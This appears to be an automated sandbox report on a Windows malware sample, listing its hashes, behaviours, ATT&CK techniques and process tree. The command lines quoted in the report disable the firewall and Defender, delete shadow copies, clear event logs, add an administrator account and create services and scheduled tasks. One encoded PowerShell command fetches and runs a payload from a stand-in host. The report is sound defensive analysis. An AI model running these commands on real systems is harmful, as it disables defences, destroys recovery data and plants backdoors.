Analysis
-
max time kernel
53s -
max time network
55s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20250502-en locale:en-us os:windows10-2004-x64 system -
submitted
03/05/2025, 15:32
Behavioral task
behavioral1
Sample
QueQtcK18.exe
Resource
win10v2004-20250502-en
General
-
Target
QueQtcK18.exe
-
Size
7.0MB
-
MD5
888de6f60367d5612ecddc1dd96229e1
-
SHA1
b888334a1b9caf8292966a8ac6aceffccb0f7045
-
SHA256
11e9d14bbff708d791c36da8ba71aa4eda882b56a85cd439cfbe98bf700cd9d3
-
SHA512
989047011fc3714d707e058faad9aceb0093eba6c3828e468d4ae51f8c25b458a189187c7ef69c5d2384d93cd3b3eb80fd80cd32e6e11876c3df5f8140c1518c
-
SSDEEP
98304:77BUGQ0nuaZ1j+LbCuZhCMYkcIt5FkOwSrIcUsLXRL2wbLp8FPg6XwKKmF:7VFuo1SPCurH/P/XRL4P2KKmF
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs 3 IoCs
pid Process
2968 wevtutil.exe
2176 wevtutil.exe
2036 wevtutil.exe
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Command and Scripting Interpreter: PowerShell 11 IoCs
pid Process
2708 powershell.exe
4012 powershell.exe
3992 powershell.exe
2232 powershell.exe
3104 powershell.exe
436 powershell.exe
3472 powershell.exe
1592 powershell.exe
2344 powershell.exe
2132 powershell.exe
4008 powershell.exe
-
Creates new service(s) 2 TTPs
-
Loads dropped DLL 6 IoCs
pid Process
4664 QueQtcK18.exe
4664 QueQtcK18.exe
4664 QueQtcK18.exe
4664 QueQtcK18.exe
4664 QueQtcK18.exe
4664 QueQtcK18.exe
-
Drops file in System32 directory 1 IoCs
description ioc Process
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process
4708 sc.exe
1208 sc.exe
2192 sc.exe
3396 sc.exe
8 sc.exe
2716 sc.exe
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process
3176 ping.exe
-
Modifies data under HKEY_USERS 41 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process
3176 ping.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
212 schtasks.exe
4736 schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process
2708 powershell.exe
2708 powershell.exe
2344 powershell.exe
1592 powershell.exe
436 powershell.exe
3472 powershell.exe
3472 powershell.exe
1592 powershell.exe
1592 powershell.exe
3472 powershell.exe
2344 powershell.exe
2344 powershell.exe
436 powershell.exe
436 powershell.exe
4008 powershell.exe
4008 powershell.exe
2132 powershell.exe
2132 powershell.exe
3104 powershell.exe
3104 powershell.exe
3992 powershell.exe
3992 powershell.exe
2232 powershell.exe
2232 powershell.exe
4012 powershell.exe
4012 powershell.exe
2132 powershell.exe
3104 powershell.exe
3992 powershell.exe
4012 powershell.exe
2232 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
description pid Process
Token: SeDebugPrivilege 2708 powershell.exe
Token: SeDebugPrivilege 2344 powershell.exe
Token: SeDebugPrivilege 1592 powershell.exe
Token: SeDebugPrivilege 436 powershell.exe
Token: SeDebugPrivilege 3472 powershell.exe
Token: SeSecurityPrivilege 2036 wevtutil.exe
Token: SeBackupPrivilege 2036 wevtutil.exe
Token: SeIncreaseQuotaPrivilege 2708 powershell.exe
Token: SeSecurityPrivilege 2708 powershell.exe
Token: SeTakeOwnershipPrivilege 2708 powershell.exe
Token: SeLoadDriverPrivilege 2708 powershell.exe
Token: SeSystemProfilePrivilege 2708 powershell.exe
Token: SeSystemtimePrivilege 2708 powershell.exe
Token: SeProfSingleProcessPrivilege 2708 powershell.exe
Token: SeIncBasePriorityPrivilege 2708 powershell.exe
Token: SeCreatePagefilePrivilege 2708 powershell.exe
Token: SeBackupPrivilege 2708 powershell.exe
Token: SeRestorePrivilege 2708 powershell.exe
Token: SeShutdownPrivilege 2708 powershell.exe
Token: SeDebugPrivilege 2708 powershell.exe
Token: SeSystemEnvironmentPrivilege 2708 powershell.exe
Token: SeRemoteShutdownPrivilege 2708 powershell.exe
Token: SeUndockPrivilege 2708 powershell.exe
Token: SeManageVolumePrivilege 2708 powershell.exe
Token: 33 2708 powershell.exe
Token: 34 2708 powershell.exe
Token: 35 2708 powershell.exe
Token: 36 2708 powershell.exe
Token: SeSecurityPrivilege 2968 wevtutil.exe
Token: SeBackupPrivilege 2968 wevtutil.exe
Token: SeSecurityPrivilege 2176 wevtutil.exe
Token: SeBackupPrivilege 2176 wevtutil.exe
Token: SeDebugPrivilege 4008 powershell.exe
Token: SeBackupPrivilege 2188 vssvc.exe
Token: SeRestorePrivilege 2188 vssvc.exe
Token: SeAuditPrivilege 2188 vssvc.exe
Token: SeDebugPrivilege 2132 powershell.exe
Token: SeDebugPrivilege 3104 powershell.exe
Token: SeDebugPrivilege 3992 powershell.exe
Token: SeDebugPrivilege 2232 powershell.exe
Token: SeDebugPrivilege 4012 powershell.exe
Token: SeIncreaseQuotaPrivilege 4012 powershell.exe
Token: SeSecurityPrivilege 4012 powershell.exe
Token: SeTakeOwnershipPrivilege 4012 powershell.exe
Token: SeLoadDriverPrivilege 4012 powershell.exe
Token: SeSystemProfilePrivilege 4012 powershell.exe
Token: SeSystemtimePrivilege 4012 powershell.exe
Token: SeProfSingleProcessPrivilege 4012 powershell.exe
Token: SeIncBasePriorityPrivilege 4012 powershell.exe
Token: SeCreatePagefilePrivilege 4012 powershell.exe
Token: SeBackupPrivilege 4012 powershell.exe
Token: SeRestorePrivilege 4012 powershell.exe
Token: SeShutdownPrivilege 4012 powershell.exe
Token: SeDebugPrivilege 4012 powershell.exe
Token: SeSystemEnvironmentPrivilege 4012 powershell.exe
Token: SeRemoteShutdownPrivilege 4012 powershell.exe
Token: SeUndockPrivilege 4012 powershell.exe
Token: SeManageVolumePrivilege 4012 powershell.exe
Token: 33 4012 powershell.exe
Token: 34 4012 powershell.exe
Token: 35 4012 powershell.exe
Token: 36 4012 powershell.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 812 wrote to memory of 4664 812 QueQtcK18.exe 86
PID 812 wrote to memory of 4664 812 QueQtcK18.exe 86
PID 4664 wrote to memory of 212 4664 QueQtcK18.exe 87
PID 4664 wrote to memory of 212 4664 QueQtcK18.exe 87
PID 4664 wrote to memory of 2708 4664 QueQtcK18.exe 89
PID 4664 wrote to memory of 2708 4664 QueQtcK18.exe 89
PID 4664 wrote to memory of 3064 4664 QueQtcK18.exe 90
PID 4664 wrote to memory of 3064 4664 QueQtcK18.exe 90
PID 3064 wrote to memory of 4708 3064 cmd.exe 93
PID 3064 wrote to memory of 4708 3064 cmd.exe 93
PID 4664 wrote to memory of 3996 4664 QueQtcK18.exe 94
PID 4664 wrote to memory of 3996 4664 QueQtcK18.exe 94
PID 3996 wrote to memory of 1208 3996 cmd.exe 96
PID 3996 wrote to memory of 1208 3996 cmd.exe 96
PID 4664 wrote to memory of 2132 4664 QueQtcK18.exe 129
PID 4664 wrote to memory of 2132 4664 QueQtcK18.exe 129
PID 2132 wrote to memory of 2192 2132 cmd.exe 101
PID 2132 wrote to memory of 2192 2132 cmd.exe 101
PID 4664 wrote to memory of 1312 4664 QueQtcK18.exe 102
PID 4664 wrote to memory of 1312 4664 QueQtcK18.exe 102
PID 1312 wrote to memory of 3396 1312 cmd.exe 104
PID 1312 wrote to memory of 3396 1312 cmd.exe 104
PID 4664 wrote to memory of 2344 4664 QueQtcK18.exe 106
PID 4664 wrote to memory of 2344 4664 QueQtcK18.exe 106
PID 4664 wrote to memory of 1592 4664 QueQtcK18.exe 107
PID 4664 wrote to memory of 1592 4664 QueQtcK18.exe 107
PID 4664 wrote to memory of 3472 4664 QueQtcK18.exe 108
PID 4664 wrote to memory of 3472 4664 QueQtcK18.exe 108
PID 4664 wrote to memory of 436 4664 QueQtcK18.exe 109
PID 4664 wrote to memory of 436 4664 QueQtcK18.exe 109
PID 4664 wrote to memory of 868 4664 QueQtcK18.exe 110
PID 4664 wrote to memory of 868 4664 QueQtcK18.exe 110
PID 868 wrote to memory of 8 868 cmd.exe 116
PID 868 wrote to memory of 8 868 cmd.exe 116
PID 1592 wrote to memory of 2036 1592 powershell.exe 117
PID 1592 wrote to memory of 2036 1592 powershell.exe 117
PID 4664 wrote to memory of 2952 4664 QueQtcK18.exe 118
PID 4664 wrote to memory of 2952 4664 QueQtcK18.exe 118
PID 3472 wrote to memory of 2968 3472 powershell.exe 120
PID 3472 wrote to memory of 2968 3472 powershell.exe 120
PID 436 wrote to memory of 2176 436 powershell.exe 122
PID 436 wrote to memory of 2176 436 powershell.exe 122
PID 2952 wrote to memory of 2716 2952 cmd.exe 124
PID 2952 wrote to memory of 2716 2952 cmd.exe 124
PID 4664 wrote to memory of 1064 4664 QueQtcK18.exe 128
PID 4664 wrote to memory of 1064 4664 QueQtcK18.exe 128
PID 4664 wrote to memory of 2132 4664 QueQtcK18.exe 129
PID 4664 wrote to memory of 2132 4664 QueQtcK18.exe 129
PID 4664 wrote to memory of 3176 4664 QueQtcK18.exe 130
PID 4664 wrote to memory of 3176 4664 QueQtcK18.exe 130
PID 4664 wrote to memory of 3992 4664 QueQtcK18.exe 134
PID 4664 wrote to memory of 3992 4664 QueQtcK18.exe 134
PID 4664 wrote to memory of 4012 4664 QueQtcK18.exe 135
PID 4664 wrote to memory of 4012 4664 QueQtcK18.exe 135
PID 4664 wrote to memory of 3104 4664 QueQtcK18.exe 136
PID 4664 wrote to memory of 3104 4664 QueQtcK18.exe 136
PID 4664 wrote to memory of 2232 4664 QueQtcK18.exe 137
PID 4664 wrote to memory of 2232 4664 QueQtcK18.exe 137
PID 3104 wrote to memory of 3252 3104 powershell.exe 142
PID 3104 wrote to memory of 3252 3104 powershell.exe 142
PID 2232 wrote to memory of 1656 2232 powershell.exe 144
PID 2232 wrote to memory of 1656 2232 powershell.exe 144
PID 3252 wrote to memory of 2976 3252 net.exe 143
PID 3252 wrote to memory of 2976 3252 net.exe 143
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
[level 1] C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"
  - Suspicious use of WriteProcessMemory
  PID: 812
  [level 2] C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 4664
    [level 3] C:\Windows\SYSTEM32\schtasks.exe
      cmdline: schtasks /create /tn MyPythonScript /tr "\"C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe\" \"C:\Users\Admin\AppData\Local\Temp\_MEI8122\QueQtcK18.py\"" /sc onstart /f
      - Scheduled Task/Job: Scheduled Task
      PID: 212
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "Set-NetFirewallProfile -Enabled False"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2708
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "sc create OneLogon18 binPath= "C:\Windows\System32\svchost.exe" start= auto"
      - Suspicious use of WriteProcessMemory
      PID: 3064
      [level 4] C:\Windows\system32\sc.exe
        cmdline: sc create OneLogon18 binPath= "C:\Windows\System32\svchost.exe" start= auto
        - Launches sc.exe
        PID: 4708
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "sc start OneLogon18"
      - Suspicious use of WriteProcessMemory
      PID: 3996
      [level 4] C:\Windows\system32\sc.exe
        cmdline: sc start OneLogon18
        - Launches sc.exe
        PID: 1208
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe" start= auto"
      - Suspicious use of WriteProcessMemory
      PID: 2132
      [level 4] C:\Windows\system32\sc.exe
        cmdline: sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe" start= auto
        - Launches sc.exe
        PID: 2192
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "sc start MaliciousService"
      - Suspicious use of WriteProcessMemory
      PID: 1312
      [level 4] C:\Windows\system32\sc.exe
        cmdline: sc start MaliciousService
        - Launches sc.exe
        PID: 3396
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2344
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "wevtutil cl Application"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1592
      [level 4] C:\Windows\system32\wevtutil.exe
        cmdline: "C:\Windows\system32\wevtutil.exe" cl Application
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
        PID: 2036
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "wevtutil cl System"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3472
      [level 4] C:\Windows\system32\wevtutil.exe
        cmdline: "C:\Windows\system32\wevtutil.exe" cl System
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
        PID: 2968
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "wevtutil cl Security"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 436
      [level 4] C:\Windows\system32\wevtutil.exe
        cmdline: "C:\Windows\system32\wevtutil.exe" cl Security
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
        PID: 2176
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "sc create MalwareService binPath= "powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==" start= auto"
      - Suspicious use of WriteProcessMemory
      PID: 868
      [level 4] C:\Windows\system32\sc.exe
        cmdline: sc create MalwareService binPath= "powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==" start= auto
        - Launches sc.exe
        PID: 8
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "sc start MalwareService"
      - Suspicious use of WriteProcessMemory
      PID: 2952
      [level 4] C:\Windows\system32\sc.exe
        cmdline: sc start MalwareService
        - Launches sc.exe
        PID: 2716
    [level 3] C:\Windows\SYSTEM32\cmd.exe
      cmdline: cmd.exe
      PID: 1064
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "schtasks /create /tn \"MaliciousTask\" /tr \"cmd.exe /c calc\" /sc daily /st 00:00"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2132
      [level 4] C:\Windows\system32\schtasks.exe
        cmdline: "C:\Windows\system32\schtasks.exe" /create /tn MaliciousTask /tr "cmd.exe /c calc" /sc daily /st 00:00
        - Scheduled Task/Job: Scheduled Task
        PID: 4736
    [level 3] C:\Windows\SYSTEM32\ping.exe
      cmdline: ping malicious-host.com
      - System Network Configuration Discovery: Internet Connection Discovery
      - Runs ping.exe
      PID: 3176
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3992
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "Set-NetFirewallProfile -Enabled False"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4012
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "net user OneLogonFintUser password1234 /add"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3104
      [level 4] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" user OneLogonFintUser password1234 /add
        - Suspicious use of WriteProcessMemory
        PID: 3252
        [level 5] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 user OneLogonFintUser password1234 /add
          PID: 2976
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "net localgroup Administrators OneLogonFintUser /add"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2232
      [level 4] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators OneLogonFintUser /add
        PID: 1656
        [level 5] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators OneLogonFintUser /add
          PID: 4752
[level 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe
  PID: 1644
[level 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe
  PID: 3856
[level 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 4008
[level 1] C:\Windows\system32\vssvc.exe
  cmdline: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID: 2188
Network
MITRE ATT&CK Enterprise v16
Execution
- Command and Scripting Interpreter 1
  - PowerShell 1
- Scheduled Task/Job 1
  - Scheduled Task 1
- System Services 1
  - Service Execution 1
Persistence
- Account Manipulation 1
- Create or Modify System Process 1
  - Windows Service 1
- Scheduled Task/Job 1
  - Scheduled Task 1
Privilege Escalation
- Account Manipulation 1
- Create or Modify System Process 1
  - Windows Service 1
- Scheduled Task/Job 1
  - Scheduled Task 1
Downloads
-
Filesize
2KB
MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5 b8f5272f1a630c61556ae3d396dc0a9a
SHA1 0fc3e0db215cdc31b8fb96caa989196916ee16eb
SHA256 ef48366dbf9c8815c000644531758f59d72258dc8aabbbc2531265948e4656e2
SHA512 07019777583138794ba2936e893e76acebba19841d41127da9ee6737843d385db1183639f468f5a582126cd325b7731afd230dfe55cbdcde31f8de26aa6c3be7
-
Filesize
64B
MD5 a236b3d32301a8a69eb1facaee013c2c
SHA1 e2797d2111ad7f584b538af1e8483c789b42c049
SHA256 d539da2916ee368cf9ad8455f0e3705300fd9fa5f30e78b3c6e8f7821e778b22
SHA512 c92ac75c33e501f4c95046e46175788574e2b4d159cb1158b8102d9f4c6b7e269e7df2fca4f43d60a68a35fbcd7b5e3b68ba44839320e5f801d9285ac83568a5
-
Filesize
64B
MD5 534b7ac514f09b0ddb01d2c941131956
SHA1 8b981b197a789efd757fc7c964e8d7c151327138
SHA256 ee5bdd4f5ff596a1dfec7e7abf31bed719b357d7f4eac10943b28ec5695a54f3
SHA512 38067e3c8ec2231160a53f80b1398ff0c16edff6e3dc20dbb8b9082dc836958ddee08e06734287a6c5f2f537572bee69e9c7324a83a823791da596589467446e
-
Filesize
944B
MD5 a10f29bd142d27667e3de4927bca93a2
SHA1 f009910db810d3826add6fdbc5d2d06d30ab200d
SHA256 6e37cf30b9188d04d5c2e5b9583a1cda02da6c86d4bd03c34c5cc80e6e8642f2
SHA512 e2c93a19888bd000e9ad79a43ede8e77493a56db21ed19d385e2cd6e6da9d3edf34e5a83c49467d28d7a7ee89d90cdb30a2cc1c6dfd9b22d68c8bb356e8f79fa
-
Filesize
1KB
MD5 f5a3c413511d951793530df77a555858
SHA1 dc964e9ca86626b19b8047ab7a0af53d17a22f50
SHA256 19664a8c1db4cd0215b35b6ca3983edb1e6e29b1f1720738d59fccb70c20cc56
SHA512 61d9fb66854c1e506ece46ea79ec0bbba2caddb0a996f310ee1475877ce967e198ef453b0a0760d76ff4c67438db5f67c6ee18873f90f23f3926847ce8aba059
-
Filesize
64B
MD5 46f70064042d4347f3408c31a877c4f5
SHA1 064ae10b4fc2318ea9666a2d6004f3836d0dad8d
SHA256 e0fbe1727af5d6db4096e8c8a48b7c8ccb4865551c19522baa75fbf3cf95b29d
SHA512 24882f6d5bc757b1893c0c1d82307df92e07e8bd2d4ab08ccd404c99abb2f308c42e8004f70fb895f8d109e9dbc890ccbbf7a5059f8d70ee6f1787aad8473ade
-
Filesize
64B
MD5 f08bb5e6f49788531694ac01cd9df894
SHA1 81edea4b2997856fedc7e27efa12837926c3924b
SHA256 24cb30bab5b03b374a25961abc5bb1f150be147e0922095997d761a9923e6606
SHA512 2ab3d93f6a49bb67408e9f981742becd964338db13c54d6281318b383230d94d814a71bdb7a00c72c6233170ef4a9332a4e1aa633db44f21dfdcbb7578d31717
-
Filesize
64B
MD5 b4c38c85d25f548e6bd2d16b79177c13
SHA1 7e22f257ab42981633783d1a8088b8837472a86f
SHA256 feae36b7f9aeec516032dde1ffecf764622247dce7596d23449525887c52d532
SHA512 dd74eab8d4b141921dfdcbbbb1a6df40c62c7aaa22b63d96bf9db4f3e851a635c77011b0c008b66daf277d93aea6a8678eff6bb939e83f3588e4b63d91ac1454
-
Filesize
117KB
MD5 32da96115c9d783a0769312c0482a62d
SHA1 2ea840a5faa87a2fe8d7e5cb4367f2418077d66b
SHA256 052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4
SHA512 616c78b4a24761d4640ae2377b873f7779322ef7bc26f8de7da0d880b227c577ed6f5ed794fc733468477b2fcdb7916def250e5dc63e79257616f99768419087
-
Filesize
83KB
MD5 684d656aada9f7d74f5a5bdcf16d0edb
SHA1 f7586da90d101b5ee3fa24f131ee93ab89606919
SHA256 449058efc99fccb9e24d640084d845c78f3f86dd34c5c126cf69e523d6320d75
SHA512 27fb2eca382675316fb96d18a1aa6b2792077481bf899cbcc658d71f787876045c05c98abf129c9670b6a1d2654d57f59e17580139fa7f482ec27234e44d4235
-
Filesize
130KB
MD5 29873384e13b0a78ee9857604161514b
SHA1 110f60f74b06b3972acd5908937a40e078636479
SHA256 5c0d5082fba1a2a3eb8d5e23073be25164c19f21304b09cecaab340dc7198815
